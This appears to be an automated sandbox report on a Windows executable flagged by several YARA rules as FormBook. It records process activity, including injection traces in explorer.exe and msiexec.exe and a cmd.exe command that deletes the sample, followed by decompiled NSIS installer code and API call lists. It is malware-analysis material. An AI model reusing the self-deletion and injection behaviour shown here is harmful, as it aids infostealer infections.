                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0x400000
                    File size:248302 bytes
                    MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:03:37:23
                    Start date:14/01/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff720ea0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    General

                    Start time:03:37:42
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\autochk.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\SysWOW64\autochk.exe
                    Imagebase:0xdc0000
                    File size:871424 bytes
                    MD5 hash:34236DB574405291498BCD13D20C42EB
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:03:37:42
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\msiexec.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                    Imagebase:0x890000
                    File size:59904 bytes
                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    General

                    Start time:03:37:46
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:03:37:47
                    Start date:14/01/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                      Execution Graph

                      Execution Coverage:12%
                      Dynamic/Decrypted Code Coverage:6.2%
                      Signature Coverage:22.3%
                      Total number of Nodes:1329
                      Total number of Limit Nodes:25

                      Graph

4057d3 38 API calls 3869->3870 3873 405568 3870->3873 3871 40573d 2 API calls 3874 4054bf DeleteFileA 3871->3874 3872 4053aa 59 API calls 3872->3877 3873->3843 3874->3877 3875 404e23 25 API calls 3875->3863 3876 404e23 25 API calls 3876->3877 3877->3858 3877->3863 3877->3871 3877->3872 3877->3875 3877->3876 3878 4057d3 38 API calls 3877->3878 3880 405a85 lstrcpynA 3877->3880 3878->3877 3879->3846 3880->3877 3881->3777 3882->3783 3884 405707 lstrlenA 3883->3884 3885 405711 3884->3885 3886 4056e5 lstrcmpiA 3884->3886 3885->3790 3885->3791 3886->3885 3887 4056fe CharNextA 3886->3887 3887->3884 3888->3794 4740 401ca5 4741 4029cb 18 API calls 4740->4741 4742 401cb5 SetWindowLongA 4741->4742 4743 40287d 4742->4743 4744 401a26 4745 4029cb 18 API calls 4744->4745 4746 401a2c 4745->4746 4747 4029cb 18 API calls 4746->4747 4748 4019d6 4747->4748 4749 4045aa 4750 4045d6 4749->4750 4751 4045ba 4749->4751 4753 404609 4750->4753 4754 4045dc SHGetPathFromIDListA 4750->4754 4760 40532a GetDlgItemTextA 4751->4760 4756 4045f3 SendMessageA 4754->4756 4757 4045ec 4754->4757 4755 4045c7 SendMessageA 4755->4750 4756->4753 4758 40140b 2 API calls 4757->4758 4758->4756 4760->4755 4761 402b2d 4762 402b3c SetTimer 4761->4762 4764 402b55 4761->4764 4762->4764 4763 402ba3 4764->4763 4765 402ba9 MulDiv 4764->4765 4766 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4765->4766 4766->4763 4768 401bad 4769 4029cb 18 API calls 4768->4769 4770 401bb4 4769->4770 4771 4029cb 18 API calls 4770->4771 4772 401bbe 4771->4772 4773 401bce 4772->4773 4774 4029e8 18 API calls 4772->4774 4775 401bde 4773->4775 4776 4029e8 18 API calls 4773->4776 4774->4773 4777 401be9 4775->4777 4778 401c2d 4775->4778 4776->4775 4780 4029cb 18 API calls 4777->4780 4779 4029e8 18 API calls 4778->4779 4781 401c32 4779->4781 4782 401bee 4780->4782 4783 4029e8 18 API calls 4781->4783 4784 4029cb 18 API calls 4782->4784 4785 401c3b FindWindowExA 4783->4785 4786 401bf7 4784->4786 4789 401c59 4785->4789 4787 401c1d SendMessageA 
4786->4787 4788 401bff SendMessageTimeoutA 4786->4788 4787->4789 4788->4789 4790 40422e 4791 404264 4790->4791 4792 40423e 4790->4792 4794 403e9e 8 API calls 4791->4794 4793 403e37 19 API calls 4792->4793 4795 40424b SetDlgItemTextA 4793->4795 4796 404270 4794->4796 4795->4791 4797 402630 4798 4029e8 18 API calls 4797->4798 4799 402637 FindFirstFileA 4798->4799 4800 40265a 4799->4800 4804 40264a 4799->4804 4801 402661 4800->4801 4805 4059e3 wsprintfA 4800->4805 4806 405a85 lstrcpynA 4801->4806 4805->4801 4806->4804 4814 4024b0 4815 4024b5 4814->4815 4816 4024c6 4814->4816 4818 4029cb 18 API calls 4815->4818 4817 4029e8 18 API calls 4816->4817 4819 4024cd lstrlenA 4817->4819 4820 4024bc 4818->4820 4819->4820 4821 40264e 4820->4821 4822 4024ec WriteFile 4820->4822 4822->4821 3436 4015b3 3437 4029e8 18 API calls 3436->3437 3438 4015ba 3437->3438 3454 40560c CharNextA CharNextA 3438->3454 3440 40160a 3441 40160f 3440->3441 3444 40162d 3440->3444 3443 401423 25 API calls 3441->3443 3442 4055a3 CharNextA 3445 4015d0 CreateDirectoryA 3442->3445 3448 401616 3443->3448 3449 401423 25 API calls 3444->3449 3446 4015c2 3445->3446 3447 4015e5 GetLastError 3445->3447 3446->3440 3446->3442 3447->3446 3450 4015f2 GetFileAttributesA 3447->3450 3460 405a85 lstrcpynA 3448->3460 3453 40215b 3449->3453 3450->3446 3452 401621 SetCurrentDirectoryA 3452->3453 3455 405626 3454->3455 3457 405632 3454->3457 3456 40562d CharNextA 3455->3456 3455->3457 3459 40564f 3456->3459 3458 4055a3 CharNextA 3457->3458 3457->3459 3458->3457 3459->3446 3460->3452 3461 401734 3462 4029e8 18 API calls 3461->3462 3463 40173b 3462->3463 3464 401761 3463->3464 3465 401759 3463->3465 3516 405a85 lstrcpynA 3464->3516 3515 405a85 lstrcpynA 3465->3515 3468 40175f 3472 405ce3 5 API calls 3468->3472 3469 40176c 3517 405578 lstrlenA CharPrevA 3469->3517 3484 40177e 3472->3484 3476 401795 CompareFileTime 3476->3484 3477 401859 3478 404e23 25 API calls 3477->3478 3480 401863 3478->3480 3479 404e23 25 API calls 3481 
401845 3479->3481 3500 402f01 3480->3500 3484->3476 3484->3477 3487 405aa7 18 API calls 3484->3487 3491 405a85 lstrcpynA 3484->3491 3497 401830 3484->3497 3499 40575c GetFileAttributesA CreateFileA 3484->3499 3520 405d7c FindFirstFileA 3484->3520 3523 40573d GetFileAttributesA 3484->3523 3526 405346 3484->3526 3485 40188a SetFileTime 3486 40189c FindCloseChangeNotification 3485->3486 3486->3481 3488 4018ad 3486->3488 3487->3484 3489 4018b2 3488->3489 3490 4018c5 3488->3490 3492 405aa7 18 API calls 3489->3492 3493 405aa7 18 API calls 3490->3493 3491->3484 3494 4018ba lstrcatA 3492->3494 3495 4018cd 3493->3495 3494->3495 3498 405346 MessageBoxIndirectA 3495->3498 3497->3479 3497->3481 3498->3481 3499->3484 3501 402f12 SetFilePointer 3500->3501 3502 402f2e 3500->3502 3501->3502 3530 40302c GetTickCount 3502->3530 3505 402f3f ReadFile 3506 402f5f 3505->3506 3514 401876 3505->3514 3507 40302c 42 API calls 3506->3507 3506->3514 3508 402f76 3507->3508 3509 402ff1 ReadFile 3508->3509 3511 402f86 3508->3511 3508->3514 3509->3514 3512 402fa1 ReadFile 3511->3512 3513 402fba WriteFile 3511->3513 3511->3514 3512->3511 3512->3514 3513->3511 3513->3514 3514->3485 3514->3486 3515->3468 3516->3469 3518 405592 lstrcatA 3517->3518 3519 401772 lstrcatA 3517->3519 3518->3519 3519->3468 3521 405d92 FindClose 3520->3521 3522 405d9d 3520->3522 3521->3522 3522->3484 3524 405759 3523->3524 3525 40574c SetFileAttributesA 3523->3525 3524->3484 3525->3524 3527 40535b 3526->3527 3528 4053a7 3527->3528 3529 40536f MessageBoxIndirectA 3527->3529 3528->3484 3529->3528 3531 403196 3530->3531 3532 40305b 3530->3532 3533 402bc5 32 API calls 3531->3533 3543 4031da SetFilePointer 3532->3543 3539 402f37 3533->3539 3535 403066 SetFilePointer 3540 40308b 3535->3540 3539->3505 3539->3514 3540->3539 3541 403120 WriteFile 3540->3541 3542 403177 SetFilePointer 3540->3542 3544 4031a8 ReadFile 3540->3544 3546 405e9d 3540->3546 3553 402bc5 3540->3553 3541->3539 3541->3540 3542->3531 3543->3535 3545 4031c9 
3544->3545 3545->3540 3547 405ec2 3546->3547 3550 405eca 3546->3550 3547->3540 3548 405f51 GlobalFree 3549 405f5a GlobalAlloc 3548->3549 3549->3547 3549->3550 3550->3547 3550->3548 3550->3549 3551 405fd1 GlobalAlloc 3550->3551 3552 405fc8 GlobalFree 3550->3552 3551->3547 3551->3550 3552->3551 3554 402bd3 3553->3554 3555 402beb 3553->3555 3558 402bdc DestroyWindow 3554->3558 3559 402be3 3554->3559 3556 402bf3 3555->3556 3557 402bfb GetTickCount 3555->3557 3568 405ddc 3556->3568 3557->3559 3561 402c09 3557->3561 3558->3559 3559->3540 3562 402c11 3561->3562 3563 402c3e CreateDialogParamA 3561->3563 3562->3559 3572 402ba9 3562->3572 3563->3559 3565 402c1f wsprintfA 3566 404e23 25 API calls 3565->3566 3567 402c3c 3566->3567 3567->3559 3569 405df9 PeekMessageA 3568->3569 3570 405e09 3569->3570 3571 405def DispatchMessageA 3569->3571 3570->3559 3571->3569 3573 402bb8 3572->3573 3574 402bba MulDiv 3572->3574 3573->3574 3574->3565 4823 401634 4824 4029e8 18 API calls 4823->4824 4825 40163a 4824->4825 4826 405d7c 2 API calls 4825->4826 4827 401640 4826->4827 4828 401934 4829 4029cb 18 API calls 4828->4829 4830 40193b 4829->4830 4831 4029cb 18 API calls 4830->4831 4832 401945 4831->4832 4833 4029e8 18 API calls 4832->4833 4834 40194e 4833->4834 4835 401961 lstrlenA 4834->4835 4836 40199c 4834->4836 4837 40196b 4835->4837 4837->4836 4841 405a85 lstrcpynA 4837->4841 4839 401985 4839->4836 4840 401992 lstrlenA 4839->4840 4840->4836 4841->4839 4842 4019b5 4843 4029e8 18 API calls 4842->4843 4844 4019bc 4843->4844 4845 4029e8 18 API calls 4844->4845 4846 4019c5 4845->4846 4847 4019cc lstrcmpiA 4846->4847 4848 4019de lstrcmpA 4846->4848 4849 4019d2 4847->4849 4848->4849 4850 4014b7 4851 4014bd 4850->4851 4852 401389 2 API calls 4851->4852 4853 4014c5 4852->4853 4854 19ece5 4859 19ebcf GetPEB 4854->4859 4856 19eeb2 4857 19ed4a 4857->4856 4860 19f1b6 4857->4860 4859->4857 4874 19ebcf GetPEB 4860->4874 4862 19f20d 4863 19f2f8 4862->4863 4865 19f305 4862->4865 4873 19f2bb 4862->4873 
4864 19f4de 5 API calls 4863->4864 4864->4873 4866 19e76f 4 API calls 4865->4866 4865->4873 4868 19f40b 4866->4868 4867 19f478 4870 19e76f 4 API calls 4867->4870 4868->4867 4869 19e76f 4 API calls 4868->4869 4868->4873 4869->4868 4871 19f497 4870->4871 4872 19e6be 4 API calls 4871->4872 4871->4873 4872->4873 4873->4856 4874->4862 4875 4025be 4876 4025c5 4875->4876 4879 40282a 4875->4879 4877 4029cb 18 API calls 4876->4877 4878 4025d0 4877->4878 4880 4025d7 SetFilePointer 4878->4880 4880->4879 4881 4025e7 4880->4881 4883 4059e3 wsprintfA 4881->4883 4883->4879

                      Executed Functions

                      Control-flow Graph

                      C-Code - Quality: 83%
                      			_entry_() {
                      				struct _SHFILEINFOA _v360;
                      				struct _SECURITY_ATTRIBUTES* _v376;
                      				char _v380;
                      				CHAR* _v384;
                      				char _v396;
                      				int _v400;
                      				int _v404;
                      				CHAR* _v408;
                      				intOrPtr _v412;
                      				int _v416;
                      				intOrPtr _v420;
                      				struct _SECURITY_ATTRIBUTES* _v424;
                      				void* _v432;
                      				int _t34;
                      				CHAR* _t39;
                      				char* _t42;
                      				signed int _t44;
                      				void* _t48;
                      				intOrPtr _t50;
                      				signed int _t52;
                      				signed int _t55;
                      				int _t56;
                      				signed int _t60;
                      				intOrPtr _t71;
                      				intOrPtr _t77;
                      				void* _t79;
                      				void* _t89;
                      				void* _t91;
                      				char* _t96;
                      				signed int _t97;
                      				void* _t98;
                      				signed int _t99;
                      				signed int _t100;
                      				signed int _t103;
                      				CHAR* _t105;
                      				signed int _t106;
                      				intOrPtr _t113;
                      				char _t120;
                      
                      				_v376 = 0;
                      				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                      				_t99 = 0;
                      				_v380 = 0x20;
                      				__imp__#17();
                      				_t34 = SetErrorMode(0x8001); // executed
                      				__imp__OleInitialize(0); // executed
                      				 *0x423f58 = _t34;
                      				 *0x423ea4 = E00405DA3(8);
                      				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
                      				E00405A85("jefgbrzfgglybaslbprz Setup", "NSIS Error");
                      				_t39 = GetCommandLineA();
                      				_t96 = "\"C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe\" ";
                      				E00405A85(_t96, _t39);
                      				 *0x423ea0 = GetModuleHandleA(0);
                      				_t42 = _t96;
                      				if("\"C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe\" " == 0x22) {
                      					_v404 = 0x22;
                      					_t42 =  &M00429001;
                      				}
                      				_t44 = CharNextA(E004055A3(_t42, _v404));
                      				_v404 = _t44;
                      				while(1) {
                      					_t91 =  *_t44;
                      					_t109 = _t91;
                      					if(_t91 == 0) {
                      						break;
                      					}
                      					__eflags = _t91 - 0x20;
                      					if(_t91 != 0x20) {
                      						L5:
                      						__eflags =  *_t44 - 0x22;
                      						_v404 = 0x20;
                      						if( *_t44 == 0x22) {
                      							_t44 = _t44 + 1;
                      							__eflags = _t44;
                      							_v404 = 0x22;
                      						}
                      						__eflags =  *_t44 - 0x2f;
                      						if( *_t44 != 0x2f) {
                      							L15:
                      							_t44 = E004055A3(_t44, _v404);
                      							__eflags =  *_t44 - 0x22;
                      							if(__eflags == 0) {
                      								_t44 = _t44 + 1;
                      								__eflags = _t44;
                      							}
                      							continue;
                      						} else {
                      							_t44 = _t44 + 1;
                      							__eflags =  *_t44 - 0x53;
                      							if( *_t44 == 0x53) {
                      								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                      								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                      									_t99 = _t99 | 0x00000002;
                      									__eflags = _t99;
                      								}
                      							}
                      							__eflags =  *_t44 - 0x4352434e;
                      							if( *_t44 == 0x4352434e) {
                      								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                      								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                      									_t99 = _t99 | 0x00000004;
                      									__eflags = _t99;
                      								}
                      							}
                      							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                      							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                      								 *((intOrPtr*)(_t44 - 2)) = 0;
                      								_t45 = _t44 + 2;
                      								__eflags = _t44 + 2;
                      								E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t45);
                      								L20:
                      								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                      								GetTempPathA(0x400, _t105);
                      								_t48 = E004031F1(_t109);
                      								_t110 = _t48;
                      								if(_t48 != 0) {
                      									L22:
                      									DeleteFileA("1033"); // executed
                      									_t50 = E00402C5B(_t111, _t99); // executed
                      									_v412 = _t50;
                      									if(_t50 != 0) {
                      										L32:
                      										E004035A6();
                      										__imp__OleUninitialize();
                      										if(_v408 == 0) {
                      											__eflags =  *0x423f34; // 0x0
                      											if(__eflags != 0) {
                      												_t106 = E00405DA3(3);
                      												_t100 = E00405DA3(4);
                      												_t55 = E00405DA3(5);
                      												__eflags = _t106;
                      												_t97 = _t55;
                      												if(_t106 != 0) {
                      													__eflags = _t100;
                      													if(_t100 != 0) {
                      														__eflags = _t97;
                      														if(_t97 != 0) {
                      															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                      															__eflags = _t60;
                      															if(_t60 != 0) {
                      																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                      																_v416 = 1;
                      																_v404 = 2;
                      																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                      															}
                      														}
                      													}
                      												}
                      												_t56 = ExitWindowsEx(2, 0);
                      												__eflags = _t56;
                      												if(_t56 == 0) {
                      													E0040140B(9);
                      												}
                      											}
                      											_t52 =  *0x423f4c; // 0xffffffff
                      											__eflags = _t52 - 0xffffffff;
                      											if(_t52 != 0xffffffff) {
                      												_v400 = _t52;
                      											}
                      											ExitProcess(_v400);
                      										}
                      										E00405346(_v408, 0x200010);
                      										ExitProcess(2);
                      									}
                      									_t113 =  *0x423ebc; // 0x0
                      									if(_t113 == 0) {
                      										L31:
                      										 *0x423f4c =  *0x423f4c | 0xffffffff;
                      										_v400 = E004035E3();
                      										goto L32;
                      									}
                      									_t103 = E004055A3(_t96, 0);
                      									while(_t103 >= _t96) {
                      										__eflags =  *_t103 - 0x3d3f5f20;
                      										if(__eflags == 0) {
                      											break;
                      										}
                      										_t103 = _t103 - 1;
                      										__eflags = _t103;
                      									}
                      									_t115 = _t103 - _t96;
                      									_v408 = "Error launching installer";
                      									if(_t103 < _t96) {
                      										lstrcatA(_t105, "~nsu.tmp");
                      										_t101 = "C:\\Users\\hardz\\Desktop";
                      										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
                      											goto L32;
                      										}
                      										CreateDirectoryA(_t105, 0);
                      										SetCurrentDirectoryA(_t105);
                      										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                      										if(_t120 == 0) {
                      											E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t101);
                      										}
                      										E00405A85(0x424000, _v396);
                      										 *0x424400 = 0x41;
                      										_t98 = 0x1a;
                      										do {
                      											_t71 =  *0x423eb0; // 0x4de368
                      											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t71 + 0x120)));
                      											DeleteFileA(0x41f050);
                      											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe", 0x41f050, 1) != 0) {
                      												_push(0);
                      												_push(0x41f050);
                      												E004057D3();
                      												_t77 =  *0x423eb0; // 0x4de368
                      												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t77 + 0x124)));
                      												_t79 = E004052E5(0x41f050);
                      												if(_t79 != 0) {
                      													CloseHandle(_t79);
                      													_v416 = 0;
                      												}
                      											}
                      											 *0x424400 =  *0x424400 + 1;
                      											_t98 = _t98 - 1;
                      										} while (_t98 != 0);
                      										_push(0);
                      										_push(_t105);
                      										E004057D3();
                      										goto L32;
                      									}
                      									 *_t103 = 0;
                      									_t104 = _t103 + 4;
                      									if(E00405659(_t115, _t103 + 4) == 0) {
                      										goto L32;
                      									}
                      									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
                      									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
                      									_v424 = 0;
                      									goto L31;
                      								}
                      								GetWindowsDirectoryA(_t105, 0x3fb);
                      								lstrcatA(_t105, "\\Temp");
                      								_t89 = E004031F1(_t110);
                      								_t111 = _t89;
                      								if(_t89 == 0) {
                      									goto L32;
                      								}
                      								goto L22;
                      							}
                      							goto L15;
                      						}
                      					} else {
                      						goto L4;
                      					}
                      					do {
                      						L4:
                      						_t44 = _t44 + 1;
                      						__eflags =  *_t44 - 0x20;
                      					} while ( *_t44 == 0x20);
                      					goto L5;
                      				}
                      				goto L20;
                      			}

                      0x004033fd
                      0x00403379
                      0x00403385
                      0x0040338a
                      0x0040338f
                      0x00403391
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403391
                      0x00000000
                      0x0040332e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004032e2
                      0x004032e2
                      0x004032e2
                      0x004032e3
                      0x004032e3
                      0x00000000
                      0x004032e2
                      0x00000000

                      APIs
                      • #17.COMCTL32 ref: 00403244
                      • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                      • OleInitialize.OLE32(00000000), ref: 00403256
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                        • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,jefgbrzfgglybaslbprz Setup,NSIS Error), ref: 00405A92
                      • GetCommandLineA.KERNEL32(jefgbrzfgglybaslbprz Setup,NSIS Error), ref: 00403293
                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,00000000), ref: 004032A6
                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,00000020), ref: 004032D1
                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                      • DeleteFileA.KERNELBASE(1033), ref: 00403398
                      • OleUninitialize.OLE32(00000000), ref: 00403416
                      • ExitProcess.KERNEL32 ref: 00403436
                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,00000000,00000000), ref: 00403442
                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,00000000,00000000), ref: 0040344E
                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                      • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                      • CopyFileA.KERNEL32(C:\Users\user\Desktop\nji3Lg1ot6.exe,0041F050,00000001), ref: 004034BF
                      • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                      • ExitProcess.KERNEL32 ref: 004035A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
